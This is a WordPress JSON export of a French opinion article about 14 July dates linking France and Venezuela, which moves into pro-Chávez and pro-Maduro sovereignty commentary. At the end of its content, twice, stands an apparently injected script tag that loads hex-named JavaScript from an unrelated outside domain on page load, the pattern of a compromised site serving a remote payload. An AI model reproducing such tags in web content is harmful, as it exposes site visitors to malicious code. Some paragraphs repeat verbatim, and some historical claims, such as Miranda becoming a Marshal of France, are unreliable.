{"id":20753,"date":"2020-08-25T14:32:52","date_gmt":"2020-08-25T14:32:52","guid":{"rendered":"http:\/\/www.lapluma.net\/?p=20753"},"modified":"2020-09-02T11:54:43","modified_gmt":"2020-09-02T11:54:43","slug":"20753","status":"publish","type":"post","link":"https:\/\/www.lapluma.net\/fr\/2020\/08\/25\/20753\/","title":{"rendered":"Les 14 juillet franco-v\u00e9n\u00e9zu\u00e9liens"},"content":{"rendered":"<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Pour les Fran\u00e7ais, le 14 juillet est par excellence la date la plus embl\u00e9matique de son histoire. En outre, le 14 juillet est une date qui, pour divers faits historiques, rappelle les liens d&rsquo;amiti\u00e9 et de coop\u00e9ration qui unissent le peuple fran\u00e7ais et le peuple\u00a0v\u00e9n\u00e9zu\u00e9lien.<\/span><\/p>\n<p>&nbsp;<\/p>\n<p><strong><span style=\"font-size: 12pt;\">14 juillet 1789.<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Gr\u00e2ce \u00e0 la R\u00e9volution fran\u00e7aise, cette date est historique, non seulement pour la France, mais pour inspirer une partie du monde.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><strong>14 juillet 1810.<\/strong><\/span><br \/>\n<span style=\"font-size: 12pt;\">Le Lib\u00e9rateur Sim\u00f3n Bol\u00edvar d\u00e9barque \u00e0 Liverpool, en Angleterre.\u00a0Sa mission diplomatique consiste aussi \u00e0 ramener au Venezuela le g\u00e9n\u00e9ral Francisco de Miranda, qui invite \u00e0 l&rsquo;accompagner un jeune\u00a0fran\u00e7ais\u00a0qu&rsquo;il a rencontr\u00e9 \u00e0 Londres, Antoine\u00a0Leleux.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Antoine Leleux, au Venezuela, deviendra secr\u00e9taire, aide de camp et homme de confiance, non seulement de Miranda, mais aussi de Bolivar. Par ailleurs, lorsque les espagnols font prisonnier le g\u00e9n\u00e9ral Miranda, c&rsquo;est Leleux qui r\u00e9ussit \u00e0 sauvegarder ses pr\u00e9cieuses archives.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><strong>14 juillet 1811.\u00a0<\/strong><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Confirmant l&rsquo;acte de la D\u00e9claration d&rsquo;ind\u00e9pendance du Venezuela d\u00e9cr\u00e9t\u00e9e le 5 juillet, le drapeau tricolore est hiss\u00e9 pour la premi\u00e8re fois sur la Place Bol\u00edvar de Caracas, pour le serment officiel des troupes v\u00e9n\u00e9zu\u00e9liennes.\u00a0Avec un Lib\u00e9rateur comme Sim\u00f3n Bol\u00edvar, arriv\u00e9 et r\u00e9sidant \u00e0 Paris en 1802, peu apr\u00e8s la R\u00e9volution fran\u00e7aise, et un Francisco de Miranda qui a activement particip\u00e9 \u00e0 cette R\u00e9volution, il est facile d&rsquo;imaginer que cette date du 14 juillet n&rsquo;est pas une simple co\u00efncidence.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>14 juillet 1811.<\/b>\u00a0<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Confirmant l&rsquo;acte de la D\u00e9claration d&rsquo;ind\u00e9pendance du Venezuela d\u00e9cr\u00e9t\u00e9e le 5 juillet, le drapeau tricolore est hiss\u00e9 pour la premi\u00e8re fois sur la Place Bol\u00edvar de Caracas, pour le serment officiel des troupes v\u00e9n\u00e9zu\u00e9liennes.\u00a0Avec un Lib\u00e9rateur comme Sim\u00f3n Bol\u00edvar, arriv\u00e9 et r\u00e9sidant \u00e0 Paris en 1802, peu apr\u00e8s la R\u00e9volution fran\u00e7aise, et un Francisco de Miranda qui a activement particip\u00e9 \u00e0 cette R\u00e9volution, il est facile d&rsquo;imaginer que cette date du 14 juillet n&rsquo;est pas une simple co\u00efncidence.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>14 juillet 1816.\u00a0<\/b><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Le g\u00e9n\u00e9ral Francisco de Miranda d\u00e9c\u00e8de en prison en Espagne. Un Miranda, honor\u00e9 sur l&rsquo;Arc de Triomphe de Paris pour avoir \u00e9t\u00e9 l&rsquo;un des cent h\u00e9ros de la R\u00e9volution fran\u00e7aise, a atteint le rang de Mar\u00e9chal de France et participa \u00e0 de nombreuses batailles au commandement des troupes du Nord de la R\u00e9volution.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>14 juillet 1816.\u00a0<\/b><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Le m\u00eame jour de la mort de Miranda, au Venezuela, l&rsquo;exp\u00e9dition des\u00a0Cayos, d\u00e9barque \u00e0\u00a0Ocumare\u00a0o\u00f9 une bataille fatidique est livr\u00e9e avec les troupes espagnoles.<\/span><br \/>\n<span style=\"font-size: 12pt;\">Le Lib\u00e9rateur Sim\u00f3n Bol\u00edvar se\u00a0retrouve\u00a0isol\u00e9 sur la plage, au point de se suicider pour ne pas se rendre \u00e0 l&rsquo;ennemi, lorsque le mul\u00e2tre fran\u00e7ais Jean Baptiste\u00a0Bideau, capitaine d&rsquo;un des navires, sauve la vie de Bol\u00edvar.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>14 juillet 1816.\u00a0<\/b><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Durant cette m\u00eame bataille d&rsquo;Ocumare, le franco-ha\u00eftien Jean Baillio est port\u00e9 disparu. Au service de la guerre d&rsquo;Ind\u00e9pendance du Venezuela, il est Imprimeur du Congr\u00e8s supr\u00eame et Imprimeur du gouvernement.\u00a0Il a ainsi contribu\u00e9 au triomphe de la cause r\u00e9volutionnaire pour presque toutes ses publications patriotiques :\u00a0brochures, journaux, et m\u00eame\u00a0celle\u00a0de la premi\u00e8re Constitution v\u00e9n\u00e9zu\u00e9lienne.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Les 14 juillet franco-v\u00e9n\u00e9zu\u00e9liens&#8230; <\/b><b>et<\/b><b>\u00a0de plus.<\/b><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Comme comment\u00e9 dans\u00a0l\u2019article\u00a0ant\u00e9rieur, la France a\u00a0c\u00e9l\u00e9br\u00e9\u00a0sa\u00a0r\u00e9volution\u00a0du 14 juillet 1789.\u00a0 Au Venezuela, nous nous souvenions des\u00a0fran\u00e7ais\u00a0qui se sont engag\u00e9s dans une autre bataille r\u00e9volutionnaire :\u00a0la guerre d\u2019ind\u00e9pendance du Venezuela, gagn\u00e9e en 1811 contre l\u2019Empire espagnol.<\/span><br \/>\n<span style=\"font-size: 12pt;\">Le 14 juillet 1808, arrive \u00e0 Caracas Paul de\u00a0Lamanon, commandant de la corvette Le Serpent, envoy\u00e9 de Napol\u00e9on pour annoncer que la dynastie des Bourbons ne r\u00e8gne plus en Espagne, mais la nouvelle dynastie de Joseph Bonaparte.\u00a0La soci\u00e9t\u00e9 aristocratique et les autorit\u00e9s v\u00e9n\u00e9zu\u00e9liennes, encore attach\u00e9es \u00e0 l\u2019Espagne, re\u00e7oivent si mal cette ing\u00e9rence que ce\u00a0fran\u00e7ais\u00a0a d\u00fb fuir sur son navire, tr\u00e8s heureux de sauver sa vie.<\/span><br \/>\n<span style=\"font-size: 12pt;\">Bien qu\u2019avec d\u2019autres id\u00e9es, ces\u00a0v\u00e9n\u00e9zu\u00e9liens\u00a0expriment d\u00e9j\u00e0 que le Venezuela doit se respecter.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Pendant deux si\u00e8cles, la R\u00e9publique du Venezuela, r\u00e9volue son \u00e9poque coloniale, fait face \u00e0 d\u2019autres p\u00e9riodes difficiles, depuis des dictatures jusqu\u2019\u00e0 \u00eatre d\u00e9clar\u00e9e \u00ab\u00a0arri\u00e8re-cour\u00a0\u00bb par les \u00c9tats-Unis qui profitent, pratiquement sans compensations, de ses ressources en hydrocarbures.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Au XXI\u00e8me si\u00e8cle, le Venezuela souverain doit se respecter.<\/b><\/span><br \/>\n<span style=\"font-size: 12pt;\">Inspir\u00e8 par Hugo Ch\u00e1vez, le peuple v\u00e9n\u00e9zu\u00e9lien lance une nouvelle r\u00e9volution et la R\u00e9publique se transforme, par une nouvelle Constitution, en R\u00e9publique Bolivarienne du Venezuela.<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\">Les manifestations du respect\u00a0a\u00a0sa souverainet\u00e9 se succ\u00e8dent, et entre autres :<\/span><br \/>\n<span style=\"font-size: 12pt;\"><i><b>2002.\u00a0Coup d\u2019\u00c9tat.<\/b><\/i>\u00a0L\u2019opposition soutenue par les \u00c9tats-Unis a renvers\u00e9 le pr\u00e9sident Ch\u00e1vez.\u00a0<span lang=\"en-US\">Le peuple prend massivement et pacifiquement les rues et obtient son retour au pouvoir.\u00a0Le coup\u00a0d\u2019\u00c9tat a dur\u00e9 47 heures.\u00a0En 2019, une poign\u00e9e d\u2019opposants et de militaires appelle le peuple \u00e0 un autre coup\u00a0d\u2019\u00c9tat.\u00a0Ils n\u2019obtiennent aucune mobilisation populaire, pas m\u00eame des opposants.\u00a0La tentative dure \u00e0 peine\u00a0quelques\u00a0heures.\u00a0<\/span><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><i><b>2005.\u00a0DEA.<\/b><\/i>\u00a0Le Pr\u00e9sident Ch\u00e1vez expulse le D\u00e9partement des Stup\u00e9fiants des \u00c9tats-Unis, apr\u00e8s avoir v\u00e9rifi\u00e9 qu\u2019il se d\u00e9diait \u00e0 de l\u2019espionnage contre le gouvernement.<\/span><br \/>\n<span style=\"font-size: 12pt;\">Pour ing\u00e9rences, Ch\u00e1vez expulse plusieurs ambassadeurs et attach\u00e9s militaires.\u00a0A\u00a0une envoy\u00e9e de Washington, il ordonne de se retirer du bureau pr\u00e9sidentiel en lui rappelant qu\u2019elle parle au pr\u00e9sident du Venezuela.<\/span><br \/>\n<i><b><\/b><\/i><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><i><b>2015.\u00a0D\u00e9cret Obama.<\/b><\/i>\u00a0Le peuple organise des manifestations massives pour demander le respect d\u2019Obama lorsqu\u2019il \u00e9dicte un d\u00e9cret d\u00e9clarant le Venezuela comme une \u00ab\u00a0menace extraordinaire et inhabituelle\u00a0\u00bb.\u00a0<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><i><b>2020.\u00a0Op\u00e9ration G\u00e9d\u00e9on.<\/b><\/i>\u00a0En provenance de Colombie, des mercenaires, dont d\u2019anciens membres des forces sp\u00e9ciales am\u00e9ricaines, tentent une incursion maritime dans le but de renverser le pr\u00e9sident Nicolas\u00a0Maduro.\u00a0Ils sont neutralis\u00e9s et d\u00e9tenus par des p\u00eacheurs membres de la milice bolivarienne.\u00a0<\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><i><b>2020.\u00a0Union europ\u00e9enne.<\/b><\/i>\u00a0Face \u00e0 ses sanctions, le pr\u00e9sident\u00a0Maduro\u00a0prend la d\u00e9cision de donner 72 heures \u00e0 l\u2019ambassadrice de l\u2019UE, Isabel\u00a0Brilhante, pour qu\u2019elle quitte le pays.\u00a0Josep\u00a0Borrell, Haut Repr\u00e9sentant pour la politique \u00e9trang\u00e8re de l\u2019UE et le chancelier v\u00e9n\u00e9zu\u00e9lien Jorge\u00a0Arreaza\u00a0r\u00e8glent cette situation diplomatiquement.<b><br \/>\n<\/b><b><\/b><\/span><\/p>\n<p style=\"text-align: justify;\"><span style=\"font-size: 12pt;\"><b>Depuis 20 ans, face aux agressions et aux ing\u00e9rences, quand ce ne sont pas les dirigeants, c\u2019est le peuple v\u00e9n\u00e9zu\u00e9lien qui <\/b><em><b>s<\/b><\/em><b>&lsquo;<\/b><em><b>exprime<\/b><\/em><b>\u00a0en clamant que<\/b> <b>\u00ab\u00a0Le Venezuela doit se respecter\u00a0\u00bb.<\/b><\/span><\/p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 14pt;\">Jean Araud para La Pluma<br \/>\n<\/span><\/strong><\/p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 14pt;\">Titre original: <a href=\"http:\/\/www.lapluma.net\/2020\/08\/25\/20753\/\">Los 14 de julio franco-venezolanos<\/a><\/span><\/strong><\/p>\n<p><strong><span style=\"font-size: 14pt;\">Edit\u00e9 par <\/span><a href=\"http:\/\/www.lapluma.net\/fr\/nosotros\/editora\/\"><span style=\"font-size: 14pt;\">Mar\u00eda Piedad Ossaba<\/span><\/a><\/strong><\/p>\n<p style=\"text-align: justify;\"><strong><span style=\"font-size: 14pt;\">Source: <a href=\"http:\/\/www.lapluma.net\/wp-content\/uploads\/2020\/08\/C.-Correo-Orinoco.No_.3825.Pag_.13.pdf\">El Correo Orinoco<\/a> . Caracas<\/span><\/strong><\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/p>\n<\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<div id=\"ffenetremailtomailModal\" style=\"z-index: 20002;\">\n<div id=\"ffenetremailtopopupModalMail\">\n<div id=\"ffenetremailtotoModalClose\"><\/div>\n<div id=\"ffenetremailtopopupQuestion\">What do you want to do ?<\/div>\n<p><a id=\"ffenetremailtoemailOpen\"><\/a>New mail<button id=\"ffenetremailtobuttonEmail\">Copy<\/button><textarea id=\"ffenetremailtotextArea\"><\/textarea><\/div>\n<\/div>\n<div><img \/><\/div>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Depuis 20 ans, face aux agressions et aux ing\u00e9rences, quand ce ne sont pas les dirigeants, c\u2019est le peuple v\u00e9n\u00e9zu\u00e9lien qui s&rsquo;exprime en clamant que \u00ab\u00a0La souverainet\u00e9 de Venezuela doit se respecter\u00a0\u00bb.<\/p>\n","protected":false},"author":694,"featured_media":20760,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"categories":[218],"tags":[10490,10497,10491,10495,10494,10500,10493,10492,10496,2034,10489,725,5799,10498,10499],"coauthors":[10488],"class_list":["post-20753","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-monde","tag-antoine-leleux","tag-bataille-documare","tag-francisco-de-miranda","tag-grace-a-la-revolution-francaise","tag-independencia-de-venezuela","tag-jean-araud","tag-juan-baillio","tag-juan-bautista-bideau","tag-les-14-juillet-franco-venezueliens","tag-libertador-simon-bolivar","tag-los14-de-julio-franco-venezolanos","tag-memoria-historica","tag-revolucion-francesa","tag-soberania-de-venezuela","tag-souverainete-de-venezuela"],"translation":{"provider":"WPGlobus","version":"2.12.2","language":"fr","enabled_languages":["es","fr"],"languages":{"es":{"title":true,"content":true,"excerpt":true},"fr":{"title":true,"content":true,"excerpt":true}}},"_links":{"self":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20753","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/users\/694"}],"replies":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/comments?post=20753"}],"version-history":[{"count":11,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20753\/revisions"}],"predecessor-version":[{"id":20757,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/posts\/20753\/revisions\/20757"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media\/20760"}],"wp:attachment":[{"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/media?parent=20753"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/categories?post=20753"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/tags?post=20753"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/www.lapluma.net\/fr\/wp-json\/wp\/v2\/coauthors?post=20753"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}